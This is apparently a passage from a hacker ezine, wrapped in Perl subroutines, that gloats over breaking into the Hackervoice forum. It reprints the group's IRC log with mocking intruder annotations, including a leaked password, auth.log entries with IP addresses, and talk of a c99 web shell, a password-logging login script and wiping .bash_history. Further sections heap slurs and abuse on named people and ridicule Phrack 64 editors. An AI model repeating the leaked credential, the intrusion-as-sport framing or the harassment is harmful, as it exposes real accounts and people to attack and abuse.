16:14 <&SHAGGSTaRR> link?
16:14 <&_hyper_> the forums went down
16:14 <&SHAGGSTaRR> :o
16:15 -!- adiboy [adiboy@thv-4A7E7657.bagu.cable.ntl.com] has quit [Quit:
Leaving]
16:15 < belial> yeah sorry i am having to do this manualy somewhat due to
the extreamly hacked nature of our forums (hacked in a good way)
16:15 < belial> so its all going to be down till i can upgrade
16:15 < belial> shouldnt take too long id imagine
16:15 <&Vesalius> its okay =]
16:16 -!- mode/#hvr [+q belial] by Vesalius
16:16 <~belial> in the mean time while the forums are down
16:16 <&Vesalius> they'll always be arseholes out there trying to ruin it
16:16 <~belial> what the hell happend anyway?
16:16 <&_hyper_> pm belial
16:16 <&Vesalius> he appears to heavily dislike psg for some reason
##yessssir
16:16 <&Vesalius> and when he noticed him
16:16 <&Vesalius> he started complaining about hackers miss representing
other
16:16 <&Vesalius> s
16:16 <&Vesalius> and elitist stuck up self conscious fuckers
16:16 <&Vesalius> lol
16:16 <&Vesalius> lol
16:17 <&SHAGGSTaRR> One of which he happened to be
16:17 <&Vesalius> yup
16:17 <&_hyper_> what was his handle again?
16:17 <&Vesalius> htek
16:17 <&SHAGGSTaRR> htek
16:17 <&Vesalius> and as per usual
16:17 <&_hyper_> that was it
16:17 <&Vesalius> he started an argument here
16:17 <&Vesalius> and
16:17 <&Vesalius> got virtually no where #LOL
16:17 <&Vesalius> as me and SHAGGSTaRR were active
16:17 <&Vesalius> so he got some rather amusing things back =]
16:17 <&SHAGGSTaRR> ROFL at itv1
16:17 <~Be|ia|> btw he was useing a shell
16:17 <&_hyper_> dont suppose you whoised him did you?
16:18 <&Vesalius> and then he posted my password in here
16:18 <&SHAGGSTaRR> this show is fucking badasssss
16:18 <&Vesalius> _hyper_, yup
16:18 <~Be|ia|> that the forum is vunrable too
16:18 <@shaman> what's up with the forums?
16:18 <&Vesalius> I've restarted since =[
16:18 <~Be|ia|> but it wasnt even his exploit ##NIGGA WUUUT?
16:18 <&Vesalius> but I have logs somewhere
16:18 <~Be|ia|> he just found that
16:18 <&SHAGGSTaRR> so wait
16:18 <&SHAGGSTaRR> it wasnt a forum exploit
16:18 <&SHAGGSTaRR> but a shell he gained?
16:18 <&SHAGGSTaRR> ssh vuln? #YES 0DAY LOL
16:19 <~belial> no no
16:19 <~belial> ill explain
16:19 <~belial> ive been fucking around with this C$hell thing
16:19 <~belial> c99 shell ##dud3, i wudn't lower myself
16:19 <@shaman> did I miss something?
16:19 <~belial> its a PHP page
16:19 <&SHAGGSTaRR> Web based shell?
16:19 <~belial> that you upload and take control over the webserver
16:19 <~belial> yeh
16:19 <&SHAGGSTaRR> ooh not good
16:20 <~belial> so he must have found it
16:20 <&SHAGGSTaRR> That shit's typically something you never use on a box
YOU pay for
16:20 <&SHAGGSTaRR> For a reason.
16:20 <&SHAGGSTaRR> :P
16:20 <@shaman> *cough*
16:20 <@shaman> what's going on? :P
16:20 <~belial> yeah i had this happen to the galleries so natrually i
removed it
16:20 <~belial> but then i stuck it on a random folder
16:20 <~belial> but guessing it got indexed
16:21 <&_hyper_> Shaman: our forums are full of holes
16:21 <&SHAGGSTaRR> Stick it somewhere not so obvious and see what
security precautions you can mod onto it
16:21 <&_hyper_> so where updating them
16:21 <&Vesalius> belial, its php?
16:22 <@shaman> not good :\
16:22 <~naxxtor> huh what eh
16:22 <&Vesalius> OH NOW he appears
16:22 <~belial> yeah itws php based
16:22 <~naxxtor> what's going on
16:22 <&Vesalius> maplins
16:22 <+x4e> the passwords in plaintext then or he crack vesa's nubby
pass?
16:22 <&Vesalius> they haxored us
16:22 <~belial> no
16:22 <&Vesalius> something about LED displays being compromised
16:22 <~belial> its very hard for them to get the password #LYING TO YOUR
NOOB FRIENDS
16:22 <&_hyper_> lol
16:22 <&Vesalius> x4e, that wasn't really nubby
16:22 <~belial> the only way is by modifing the loging script
16:23 <~naxxtor> what happened?
16:23 <~belial> to echo the entered password to a file
16:23 <+x4e> werent it like 3 chars ves?
16:23 <+BOfH> They got p4wned
16:23 <&SHAGGSTaRR> So he must had had access to where they were stored on
your end
16:23 <&Vesalius> x4e, no it want
16:23 <~belial> the forums are down due to UPGRADES not pwnage
16:23 <+x4e> ahh kk i misread then :D
16:23 <&SHAGGSTaRR> UPGRADES brought on by pwnage
16:23 <&_hyper_> lmao @ belial ## thats the spirit
16:23 <&Vesalius> belial, that means hes had access for a while then
16:23 <~naxxtor> eh
16:23 <&Vesalius> if he is echoing when we login
16:24 <+BOfH> belial: Turn the server off, seize the disks and rebuilt it
on new disks
16:24 <&Vesalius> the last time I logged in before he pasted it in here
16:24 <~naxxtor> why do all the exciting things happen when i'm indisposed
16:24 <&_hyper_> or he has downloaded the database
16:24 <&Vesalius> was very early yesterday
16:24 <&Vesalius> or possibly the day before
16:24 <&Vesalius> naxxtor, because you could of helped
16:24 <~naxxtor> someone comrpromised the login script didn't thety
16:24 <~belial> no he cant download the database
16:25 <~naxxtor> i knew it!!! i've suspected that for AGES
16:25 <&SHAGGSTaRR> I think he had access to where they were stored on the
server, not waiting for people to log in.
16:25 <~belial> IPB doesnt work like that
16:25 <+BOfH> belial: Is this the thing that's hosted on a VM?
16:25 <&SHAGGSTaRR> So how does IPB work then to check that a pass given
correlates with the pass stored?
16:26 <~naxxtor> it'll md5 hash the password that's been input
16:26 <~naxxtor> then compare it to an md5 in the DB
16:26 <&Vesalius> but if he compromised it
16:26 <&SHAGGSTaRR> So he's had awhile to crack 'em then =/
16:26 <&Vesalius> that means he has most peoples
16:26 <~belial> its a MD5 salt
16:26 <~naxxtor> however if you modified the login script he'd have access
to plaintext passwords
16:26 <~naxxtor> which is bad
16:26 <&Vesalius> exactly
16:26 <&SHAGGSTaRR> Well md5s aren't uncrackable
16:26 <&SHAGGSTaRR> http://www.milw0rm.com/cracker for example
16:26 <&Vesalius> hes had access to it for over 24 hours in that case
16:26 <~belial> md5s arnt, but they are salted
16:27 <~naxxtor> SHAGGSTaRR, md5s arn't uncrackable but it still takes a
long time
16:27 <~naxxtor> it's easier to snarf the passwords
16:27 <&SHAGGSTaRR> So either way he's had a good while to play with the
box =/
16:28 <~belial> anyway it will all be sorted out soon in a few seconds
16:28 <~belial> no last acess was today
16:28 <~belial> and no access was made to database
16:28 <~naxxtor> where were the passwords being stored
16:29 <~belial> on a fag packet
16:29 <~belial> btw forums are back up
16:31 <&Vesalius> belial, he had access for at least 24 hours though
16:31 <~naxxtor> did you pay for them this time?
16:32 <~belial> yes
16:33 <~naxxtor> cool
16:33 <~naxxtor> now what happened to our old theme
16:33 <&_hyper_> lol on a fag packet
16:34 <~belial> refresh your browser duuud
16:34 <&_hyper_> :p
16:39 <&SHAGGSTaRR> Some guy on the news is called Bredan DeBeer
16:39 <&SHAGGSTaRR> Thats an awesome name
16:39 <&SHAGGSTaRR> BREAD AND DA BEER
16:39 <&SHAGGSTaRR> He has it all right in his name
16:40 <@muftak> lol, i now have 3 cablemodems online at the same time
16:41 <&SHAGGSTaRR> l33b
16:49 <&_hyper_> right bed time
16:49 <&_hyper_> busy day tomorrow
16:49 <&_hyper_> :)
16:49 <&_hyper_> night all
16:49 -!- _hyper_ [hyper@members.hackervoice.co.uk] has quit [Quit:
Leaving]
16:50 -!- _hyper_ [hyper@members.hackervoice.co.uk] has joined #hvr
16:50 -!- mode/#hvr [+oa _hyper_ _hyper_] by ChanServ
16:51 -!- _hyper_ [hyper@members.hackervoice.co.uk] has quit [Quit:
Leaving]
16:52 <&SHAGGSTaRR> Aww he missed us and wanted to come back and make sure
we're all okay.
16:54 <&Vesalius> lol
16:54 <&Vesalius> I remember when he came back to the pub
16:54 <&Vesalius> said he went to maccies and bought the kiddys a happy
meal
16:54 <&Vesalius> Be|ia| &&|| belial, thank you for fixing the forums
16:55 <&Vesalius> thats the geekiest and or ever
16:56 <&Vesalius> OMFG
16:56 <~belial> Vesalius: no problem, anything for the community
16:56 <&Vesalius> =]
16:56 <&Vesalius> I hope they don't talk this all the way through this
episode of Dr Who
16:57 <&Vesalius> I feel like im stuck in English Literature again
16:57 <&Vesalius> belial, we helped =]
16:57 <&Vesalius> I glined him several times
16:57 <&Vesalius> somehow though
16:57 <&Vesalius> he seemed to be connected through naxxtor
16:57 <&Vesalius> he had the same IP and host
16:57 <+Jordan> bai
16:58 -!- Jordan [Jordan@thv-189B68CB.bagu.broadband.ntl.com] has quit
[Quit: Leaving]
16:58 <&Vesalius> bai
17:00 <~naxxtor> huh what
17:01 <~naxxtor> iiah
17:01 <~naxxtor> fucker
17:01 <~naxxtor> i gave him a shell ### OWNED
17:01 <&Vesalius> hahahahaha
17:02 <~belial> ??who?
17:02 <&Vesalius> "When you get home you can tell everyone you've seen
shakespeare"
17:02 <~naxxtor> and he symlinked .bash_history to /dev/null
17:02 <&Vesalius> "yeah and I can get sectioned"
17:02 <&Vesalius> naxxtor, thats quite clever =]
17:02 <&Vesalius> but wrong
17:02 <~belial> who did you give a shell to?
17:02 <~naxxtor> m4tr1x
17:02 <&Vesalius> >=[
17:02 <~belial> why?
17:02 <&Vesalius> m4tr1x === htek
17:02 <&Vesalius> btw
17:02 <~naxxtor> i gave him a shell on a VM
17:03 <~belial> why?
17:03 <~naxxtor> completely sectioned off from the rest of the world ##not
really fag, i irc'd from it..
17:03 <~naxxtor> so all he had access to was my external connection
17:03 <~naxxtor> because i was feeling charitable
17:03 <~naxxtor> and didn't think it'd make any different
17:03 <~belial> i wouldnt give shells to random people naxx...
17:04 <~naxxtor> it was on an isolated VM
17:04 <~naxxtor> which i've set up to be a shell server
17:04 <~naxxtor> he had access to nothing
17:04 <~belial> ok
17:04 <~naxxtor> all he did was run irssi
17:04 <&Vesalius> and
17:04 <~belial> but would that not bypass the gline then
17:04 <&Vesalius> symlink bash history
17:04 <&Vesalius> belial, nope
17:04 <&Vesalius> he was glined from that connection
17:05 <~belial> ok
17:05 <&Vesalius> the same one naxxtor was one
17:05 <&Vesalius> he only used it so I couldnt gline him
17:05 <&Vesalius> lol
17:05 <&Vesalius> because it would of glined nax too
17:05 <~naxxtor> ?
17:05 <~belial> he was being an ass on IRC
17:05 <&Vesalius> /gline *m4tr1x*@whatever.plus.com
17:05 <~belial> he got glined, then used the vm you gave him
17:06 <&Vesalius> and got glined again
17:06 <&Vesalius> I glined him
17:06 <&Vesalius> erm
17:06 <&Vesalius> 3 maybe 4 times
17:06 <~belial> to connect so that he couldnt get glined
17:06 <&Vesalius> was so much fun ## If you think thats fun, you should
try out hacking :D
17:06 <&Vesalius> im hoping he will return at some point
17:06 <&Vesalius> so I may gline him further
17:06 <~naxxtor> well all he needs to do is change his config
17:06 <~naxxtor> i've removed his access
17:06 <&Vesalius> his home one is glined too btw
17:06 <~belial> who is l0l?
17:06 <&Vesalius> we arn't sure
17:07 <&Vesalius> allthought htek said he wasn't alone here
17:07 <&Vesalius> but I recognise the nick
17:07 <&Vesalius> sts
17:07 <&Vesalius> xelix
17:07 <&Vesalius> erm
17:08 <~naxxtor> he tried to root the box lol
17:08 <@muftak> isn't symlinking .bash_history to /dev/null the first
thing everyone does on a shell?
17:08 <~naxxtor> vm01 sudo: m4tr1x : user NOT in sudoers ; TTY=ttyp1 ;
PWD=/home/m4tr1x ; USER=root ; COMMAND=/bin/su
17:08 <~naxxtor> /var/log/auth.log:May 9 16:09:22 vm01 sshd[3770]:
Accepted password for m4tr1x from 66.119.207.196 port 24455 ssh2 ## LOL
17:08 <~naxxtor> woot
17:08 <&Vesalius> hmm
17:08 <&Vesalius> l0l is from smashthestack
17:09 <@zinya-> why do we got loads of weirdos?
17:09 <@zinya-> get*
17:09 <~naxxtor> shall we gline cpucafe?
17:09 <~naxxtor> because we ARE loads of weirdo
17:09 <~naxxtor> s
17:09 <@zinya-> yes
17:09 <@zinya-> lol
17:09 <~belial> right im going to have to kill this irc session
17:10 <~naxxtor> /var/log/auth.log:May 9 00:36:12 vm01 sshd[6117]:
Accepted password for m4tr1x from 68.230.70.235 port 61298 ssh2
17:11 <~naxxtor> huh?
17:11 <&Vesalius> it has angered him
17:11 <&Vesalius> GRR
17:11 <~naxxtor> so what was this guy's beef
17:11 <&Vesalius> he doesn't like psg
17:11 <&Vesalius> as psg is apparantly a self proclaimed elitest hacker
##YOU ARE LEARNING
17:11 <&Vesalius> and he is part of cDc
17:11 <~naxxtor> ah right i think i know
17:11 <&Vesalius> so htek naturally hates him
17:11 <~naxxtor> hang on i can show you why he came
17:11 <@zinya-> and cdc give hackers a bad name
17:12 <&Vesalius> and mainly stressed because psg has a wikipedia entry
17:12 <&Vesalius> but so does David Mytton
17:12 <@zinya-> he was looking for someone originally
17:12 <@zinya-> i think
17:12 <&Vesalius> who?
17:12 <@zinya-> erm
17:12 <~naxxtor> http://milw0rm.com/papers/134 ## naxxtor loves meeee
17:13 -!- belial [belial@thv-C1670C73.bethere.co.uk] has quit [Ping
timeout]
17:13 <~naxxtor> == The Target ==
17:13 <~naxxtor> Your target is a shameless corporate tool. His name is
Mark Hinge and his
17:13 <~naxxtor> contemporary nick is psg.
17:13 <@zinya-> 17:27 -!- htek [htek@106D0D81.19BCA1BF.9EAC391E.IP] has
joined #hvr
17:13 <@zinya-> 17:28 < htek> hey, this is a uk based site right?
17:13 <@zinya-> 17:28 < htek> this is a long shot
17:13 <@zinya-> 17:28 < htek> but do any of you know
coder-underground.com?
17:13 <~naxxtor> lol wtf
17:14 <@zinya-> 17:28 < htek> im looking for a guy who used to be an admin
there
17:14 <@zinya-> 17:28 < htek> i lost touch
17:14 <@zinya-> 17:29 < htek> did any of you guys goto coder-underground
17:14 <@zinya-> 17:29 < htek> all i know is that the guy was uk
17:14 <@zinya-> 17:29 < htek> his name was Uminashoe
17:14 <~Be|ia|> i know uminashoe
17:14 <@zinya-> lol
17:14 <&Vesalius> I think I do too
17:14 <&Vesalius> and I recognise the url
17:15 <~naxxtor> if he was trying to pwn psg then he failed miserabley
#LMFAOROFLLMFAOROFLLMFAOROFL naxxtor you fag (btw, naxxtor pw = t1ddl3s)
17:15 <~Be|ia|> Uminashoe used to go to 2600 we lost touch a while back
17:15 <&Vesalius> sub Contact {
17:15 <&Vesalius> Since we know you all enjoyed this issue very very much
we setup an e-mail account
17:15 <&Vesalius> for you to send us your questions or comments, so feel
free!
17:15 <&Vesalius> iLite [at] hushmail.com
17:16 <&Vesalius> lol
17:16 <&Vesalius> MAILRAEP
17:16 <~Be|ia|> what the hell is up with the topic?
17:16 -!- Vesalius changed the topic of #hvr to: HA - CKER VOICE RADIOOOO
| 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 | <naxxtor> we should
have sajoin'd shaggstar and jojo into the pub |
http://stream.hackervoice.co.uk:8000/stream.mp3.m3u teh stream | <htek> i
am jealous of your life
17:16 <&Vesalius> yeah that was SHAGGSTaRR I do apologise
17:16 <~Be|ia|> fucks sake
17:16 <&SHAGGSTaRR> You said it
17:16 <&SHAGGSTaRR> muftak said topic it
17:16 <&SHAGGSTaRR> I topiced it
17:17 <~Be|ia|> no excuse
17:17 <&SHAGGSTaRR> NOEXCEPTIONS
17:17 <&SHAGGSTaRR> It's not an excuse
17:17 <&SHAGGSTaRR> I'm saying what happened.
17:17 <@zinya-> lol
17:17 <@zinya-> OSHIELDS2005: grindordie and mr cheese took our open
source missions, from our staff
17:17 <@zinya-> forum, and put them on thier site, first of all, almost
all the basics, unless new
17:17 <@zinya-> we doint copy, or as it would seem
17:17 <@zinya-> ones were recently added within the past 8 months, 3
reals, 2 steganos, 2
17:17 <@zinya-> javascript, and the war games they have, which is why eg
hasnt released our yet, so
17:17 <@zinya-> took their open source missions
17:17 <~naxxtor> hey Be|ia| call me :)
17:17 <@zinya-> erm, open soure
17:17 <@zinya-> source*
17:17 <~Be|ia|> dont make me have to get the whip out :P
17:18 <~Be|ia|> anyway back to nurseing my latop
17:18 <~naxxtor> just for a second
17:18 <@muftak> SHAGGSTaRR: jump off a cliff
17:18 <&SHAGGSTaRR> muftak, nokthx.
17:18 <&SHAGGSTaRR> Why?
17:18 <@muftak> SHAGGSTaRR: you have to do everything i tell you to do :)
17:18 <&SHAGGSTaRR> brb, finding a nearby cliff.
17:19 -!- SHAGGSTaRR [Johnathy@cpc4-bagu6-0-0-cust210.bagu.cable.ntl.com]
has quit [Killed (Vesalius (brb jumping off cliff))]
17:19 -!- SHAGGSTaRR [Johnathy@thv-9A657BEB.bagu.cable.ntl.com] has joined
#hvr
17:20 <&Vesalius> =]
17:20 < SHAGGSTaRR> Ves change my hostserv host plz?
17:20 <&Vesalius> Vesalius> I havn't heard from you since FR went down
17:20 <&Vesalius> <Vesalius> how have you been?
17:20 <&Vesalius> <akriel> well busy actually
17:20 <&Vesalius> <akriel> was hired on as a ethical hacker
17:20 <&Vesalius> <akriel> then i quit to become a senior admin
17:20 <&Vesalius> <akriel> then i got married
17:20 <&Vesalius> <akriel> had a kid
17:20 <&Vesalius> <akriel> bought a house
17:20 <&Vesalius> <akriel> new cars
17:20 <&Vesalius> <akriel> got promoted to ISO
17:20 <&Vesalius> <akriel> information security officer
17:21 <&Vesalius> 2 years
17:21 <&Vesalius> thats kind of depressing
17:21 <&Vesalius> ive done like
17:21 <&Vesalius> nothing
17:21 <@muftak> have you drunk beer and had fun?
17:22 <&Vesalius> I dont drink much
17:22 <&Vesalius> and when I do
17:22 <&Vesalius> I dont drink beer
17:22 <&Vesalius> ive had fun
17:22 <&Vesalius> =]
17:22 <&Vesalius> LOTS
17:22 <&Vesalius> of fun
17:22 <@muftak> he is having to put up with a nagging wife and screaming
kid
17:23 <&Vesalius> erm
17:23 <&Vesalius> hes typing in acronymns
17:23 <&Vesalius> <Vesalius> <akriel> was hired on as a ethical hacker
17:23 <&Vesalius> <akriel> attracks to much attention
17:23 <&Vesalius> <Vesalius> care to explain about that?
17:23 <&Vesalius> <akriel> yeah I worked for a comp here in dallas
17:23 <&Vesalius> <akriel> I did sec audits for goverment compliance
17:23 <&Vesalius> <akriel> such as
17:23 <&Vesalius> <akriel> ffiec
17:23 <&Vesalius> <akriel> fdic
17:24 <&Vesalius> <akriel> glba
17:24 <&Vesalius> <akriel> hippa
17:24 <&Vesalius> <akriel> sox
17:24 < SHAGGSTaRR> HIPPASOX
17:24 < SHAGGSTaRR> Almost like hoppopotamus socks
17:24 < SHAGGSTaRR> hippo socks would be great
17:25 <@zinya-> it sounds like they're targetting psg for no real reason
at all
17:26 * SHAGGSTaRR prods psg with a stick
17:26 <@zinya-> sounds like facisim to me
17:27 <@zinya-> fascism*
17:27 <&Vesalius> lol
17:27 <&Vesalius> akriel listens to the show
17:27 <&Vesalius> >_<
17:28 < SHAGGSTaRR> Where's akriel from (on the net)?
17:28 <&Vesalius> FR
17:28 <&Vesalius> fallenroot
17:28 <&Vesalius> which doesn't exist
17:28 <&Vesalius> and hasn't done for two years =[
17:28 <&Vesalius> first ever community I belonged too
17:28 <&Vesalius> was only about 10 of us
17:28 -!- mode/#hvr [+a SHAGGSTaRR] by Vesalius
17:29 <&SHAGGSTaRR> hmm first community I can say I belonged to was ABS on
LCIRC
17:30 <&SHAGGSTaRR> Which kinda spans out to the far corners of the
popular Unreal-running IRC networkds
17:30 <&SHAGGSTaRR> -d
17:31 <@zinya-> i belonged to #zelda_chat on some guys server
17:31 <@zinya-> when i was about 14
17:32 <@zinya-> full of n00bs who thought they could own people
17:32 <&Vesalius> wow
17:32 <&Vesalius> for the first time in 2 years
17:32 <&Vesalius> I know why FR dissapeared # Editor's note: Who doesn't
remember the FR-boobys debacle?
17:32 <@zinya-> and they had a weird obsession with being called 'insert
random colour here'Nugget
17:33 <@zinya-> like BlueNugget
17:33 <@zinya-> or RedNugget
17:33 -!- muftak is now known as BlueMuftak
17:33 <@zinya-> then it went to BN
17:33 <@zinya-> and RN
17:33 <@zinya-> i think there was a gold aswell
17:33 <&SHAGGSTaRR> I know someone who calls himself DarkNugget
17:33 -!- BlueMuftak is now known as PinkMuftak
17:33 <&SHAGGSTaRR> But I think it's cause his surname's nugent
17:33 -!- PinkMuftak is now known as GreenMuftak
17:34 <+psg> Yo?
17:34 <@zinya-> hello, just reading up on your 'targetting'
17:34 <@GreenMuftak> damn, server wont let me change nick again, i'm stuck
on green
17:34 <+psg> That was last November ## WE NEVER FORGET
17:34 <+psg> ;)
17:34 <@GreenMuftak> did you pwn you?
17:34 <@zinya-> they sound like fascists
17:34 <&SHAGGSTaRR> Irony or what eh muftak?
17:35 <+psg> they sound like children. ##so do you when you talk to your
gf.
17:35 <&SHAGGSTaRR> "It's stuck on green and won't let me go!" XD
17:35 <+psg> and no I've been hacked precisely 0 times. ## WE TOOK YOUR
OWNAGE VIRGINITY :D
17:35 <+psg> :)
17:35 <@GreenMuftak> "make it come green""
17:35 -!- GreenMuftak is now known as muftak
17:42 <&Vesalius> oh god
17:42 <&Vesalius> I missed akriel
17:42 <&Vesalius> I spent a year looking for those guys
17:42 <&Vesalius> a whole year
17:42 <&Vesalius> and then found some by accident
17:42 <&Vesalius> =]
17:42 <~naxxtor> lol
17:44 <@oOJINxOo_> 2007-01-18[ezine] ZFO 2 january the 18th...
there doing a really really really bad job of 0wning you psg ^_^
17:44 <@oOJINxOo_> their*
17:44 <@zinya-> they're*
17:44 <@oOJINxOo_> ty
17:44 <~naxxtor> lol
17:44 <~naxxtor> yes
17:47 <&SHAGGSTaRR> fucking greta
17:47 <&SHAGGSTaRR> Great even
17:47 <&SHAGGSTaRR> I have a funeral to attend =/
17:47 <~naxxtor> oh ..
17:48 <&SHAGGSTaRR> I might brust in, blast yakety sax, pimpslap the
preist guy then skip out.
17:48 <&SHAGGSTaRR> burst*
17:48 <&SHAGGSTaRR> No that really wouldnt go down to well
17:48 <~naxxtor> no
17:48 <~naxxtor> probably not appropriate
17:48 <&SHAGGSTaRR> I've never been to a funeral before =/
17:48 <@oOJINxOo_> get used to them
17:49 <&SHAGGSTaRR> ...
17:49 <@oOJINxOo_> use*
17:49 <&SHAGGSTaRR> I dont even OWN any formal clothing
17:49 <&SHAGGSTaRR> my mate was like "Dig your school pants and shoes up
and borrow one of my white collarared shirts"
17:49 <@oOJINxOo_> should be fine
17:50 <&Vesalius> LOL @ nighty night shakespeare
17:50 <@oOJINxOo_> + your like 15, so people probably wont expect 2 much
from you, just being there will be enough ya know
17:50 <+psg> oOJINxOo_: at least one of the coloc's i use is completely
wide open too ## you seem proud fag
17:51 <+psg> ho hum.
17:51 <@oOJINxOo_> sry if your not 15, not great at remebering peoples
ages
17:51 <&SHAGGSTaRR> I'm 15 :P
17:52 <&SHAGGSTaRR> Well actually I'm part of an m15 pedo sting posing as
a 15 year old on IRC
17:52 <@zinya-> can someone post the second part of ep 55 of bleach to
youtuble plz
17:52 <&SHAGGSTaRR> So yeah, my character is fifteen.
17:52 <@oOJINxOo_> lol
17:52 <@zinya-> there isn't one, but there is a part 3
17:52 <@oOJINxOo_> was that like the first/only guy who has come after ya
so with that motive psg?
17:53 <@oOJINxOo_> so far*
17:57 <~naxxtor> mmkay
17:57 <~naxxtor> now anyone using cpucafe.com is blocked from everything
17:57 <&SHAGGSTaRR> But cpucafe.com was so fun to explore!
17:57 <~naxxtor> continue exploring
17:57 <&SHAGGSTaRR> susie.cpucafe.com ;)
17:57 <~naxxtor> but anyone within their netblock can't access IRC, the
stream or the website
17:59 <~Be|ia|> wooo hooo i fucking done it
17:59 <@oOJINxOo_> hppy nw dy
17:59 <~Be|ia|> i got ubuntu fisty working on my propriotiry arse of a
laptop
18:00 <@oOJINxOo_> nice
18:00 <&SHAGGSTaRR> rofl ubuntu fisty
18:00 <~Be|ia|> feisty
18:00 <~Be|ia|> or however its spelt
18:00 <@muftak> fisty flange
18:00 <@oOJINxOo_> lol
18:00 -!- SHAGGSTaRR changed the topic of #hvr to: HA - CKER VOICE
RADIOOOO | 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 | <naxxtor> we
should have sajoin'd shaggstar and jojo into the pub |
http://stream.hackervoice.co.uk:8000/stream.mp3.m3u teh stream | <htek> i
am jealous of your life | <Be|ia|> I got ubuntu fisty working
18:00 <~Be|ia|> although i need to fix the keymapping is its all out of
whack
18:01 <@oOJINxOo_> UBUNTU FISTY - for all your hardcore pron needs
18:01 <@muftak> i must have been lucky, it all worked out of the box with
my thinkpad
18:01 <+Crypt> lol multi-screen support for more porn
18:01 <&SHAGGSTaRR> UBUNTU FISTY - Shuttleworth WILL include proprietary
codecs...
18:02 <@muftak> now with usb powered screen wipers
18:02 <+Crypt> yeh :(
18:04 -!- Zakolus [0x5A616B@thv-76E311E6.bna.bellsouth.net] has joined
#hvr
18:04 -!- mode/#hvr [+v Zakolus] by ChanServ
18:04 <+Zakolus> Hello
18:07 <&Vesalius> ji
Hackervoice, please get off the internet, btw, your forum is sniffed
AGAIN.
I'll leave you with a little response to Belial regarding this post:
As this a open community and everyone knows we try and run a clean ship
here. I would like to inform you about whats been going on in the
background
As you may know we are good friends with psg from CDC and whitedust. With
every person that has a bit of internet recognition develops a following
of asshats who envy him/her.
This one particular asshat has a deathwish for psg. He has spent most of
his time and life trying to own psg. but never got anywere.
he goes by the name of "bones" & "kingpin" and possibly other handels. he
likes to be a lot of people to make himself look like he has friends.
He thinks he is a uber hacker. But all he did was run a well known exploit
on admittedly out of date forums (now have of course been upgraded) to log
passwords!
he also thought it would make him cool to use a c99 shell tongue.gif And
this noob even tryed to run irssi on our shared hosts? I mean WTF did he
really think a host would have irssi ?? is he *that* stupid.
So if you do come across this asswhipe who has an agenda for psg and
possibly myself now dont give him any attention just ignore his skiddy
attacks.
He claims to be a hacker but all hackers hate what he does and he has not
reputation but collects emenies. He thinks he wins but he has nothing to
defend. For us being offline for 2 days is just a ripple in the ocean. He
is not worth my time or anyone elses. HE is nothing, he writes a shitty
Ezine for milw0rm and thinks that will get him instant respect. So what
you took us offline do you think I could be bothered. if all you have to
live up to is pissing hackers off then i wish you all the best.
Now you not only have psg to look out for, the CDC, whitedust. but you
also have the biggest UK hacking community to fear.
well done. so tell me do you feel big?
also i would like to add a further point. Im taking a zero tolerance to
noobs like this from now on. if you remeber "pr0n" yeah he is gone too.
any more will get a ass full of belial tongue.gif
Belial out.
---* we do not envy psg/cdc/whitedust and neither should you.
---* when we did get around to attacking psg it didn't take us long at
all.
---* please direct me to some of this internet recognition.
---* I like your "never got anywhere line"...
---* what is this well known exploit i used? stop lying to cover your noob
ass belial.
---* irssi on webhost, dude, does this zine make it look like we are the
type of people that wouldn't remove logs? anything there is intentional
for lolz like this..you see, we like to make noobs look like noobs.
You don't need any help with that.
---* I don't want respect.
---* rofl, i think its psg, CDC, and whitedust who need to look out for
me. now fuck off you fat cunt.
---* btw, your mother should have drowned you at birth...look at yourself
in a mirror pudding boy!
(http://www.img79.imageshack.us/img79/5342/daifqtpiedlm4sh6.jpg).
EOHACKERVOICE
);}
sub P64 { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; say($self, <<'EOP64'
Hello Hackers! I am elite Romanian hacker. I am the Circle of Lost
Hackers. Is joke: circle begins and ends with me. I am the well educated.
I was in school and taking the English courses. I will unite the
underground. Big concessions (concessions nice word, yes?) are made by
all. Bad guys must stop being so bad, and good guys must stop using good
grammar. Enjoy the Phrack 64!
Some cynics (cynics good word, yes?) complain these type things:
- We are the not qualified to edit: Some or all of we cannot write decent
English.
- We do not edit: We did not fixed the punctuation, spelling, or grammar
issues that are prevalent throughout Phrack 64.
Excuse me copy-paste english (love babelfish LOL)
I think you should think outside box, hacker think outside box, to think
through my English.
We not so bad, authors not so good also! Authors make us words
"genericity" and "prophety" when silly authors probably think
"genericalness" and "prophecy"!.
Phrack authors hacker masters of run-on sentences. They do not have my
Romanian skill of simple short sentence! See this eg. from master Phrack
author:
"Instead of going straight to the results of the proposed implementation,
we may introduce the domain of program analysis, without going deeply
in the theory (which can go very formal), but taking the perspective
of a hacker who is tired of focusing on a specific exploit problem
and want to investigate until which automatic extend it is possible
to find vulnerabilities and generate an exploit code for it without
human intervention."
The part "until which automatic extend" random from a common dictionary,
this method I well know!
My Phrack authors don't much read over their work but we read and we think
pretty good! We think double double word make point DOUBLE STRONG! Phrack
authors much do! "The method which I now propose relies on an undocumented
the undocumented Mac OS X system call".
Phrack has two kinds of authors, and these be them:
Weird foreigner with a small grasp of the English, such as Borat.
American with full sixth-grade education, like as Jethro from The Beverly
Hillbillies.
Before go, Here, good pro-Romanian anti-Bulgarian (boo Bulgara!) joke from
www:
You know the good thing about Romanians? They get shit done! Do you know
why we do not hear about Bulgarian hackers? Because the Romanians are
better! At any given moment, a dozen hackers throughout Bulgaria are
saying "Shit, those fucking Romanians beat me to it!"
Your truely,
PHRACK STAFF: Back on action.
PHRACK 64: Someone got do it.
==
If you want readers to imagine you as either Borat or Jethro, continue
writing without reading over your work. Write without editing. Write
without a dictionary. Write without submitting to a native English
speaker. It may become increasingly difficult for me to maintain a high
level of respect for the professionalism of my associates as a whole.
Thank you, gladio and g463, for contributing fine articles with fine
English. Thank you, Borat and Jethro, for your fine work on the rest of
the articles in Phrack 64.
EOP64
);}
sub Cypherxero { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOCYPHERXERO'
Oh cypherzero how fun he was with his elite blogs and even more elite
bash/perl scripts. Left us wordless!
Since cypherzero's blogging days are over ( he killed his site :( ) we
should introduce who cypherzero was:
"I'm 22 years old, and I'm a computer hacker that's about to be on the
move by myself to the big city.
That city is Seattle, and I'm going to live it up, leet hacker style,
bitches."
Obtained from http://www.flickr.com/people/cypherxero/. See we're not
making this stuff up!
"My name is Cody, otherwise known as CypherXero in the digital online
world.
I'm 22 years old, and I live, eat, breathe, and sleep computers.
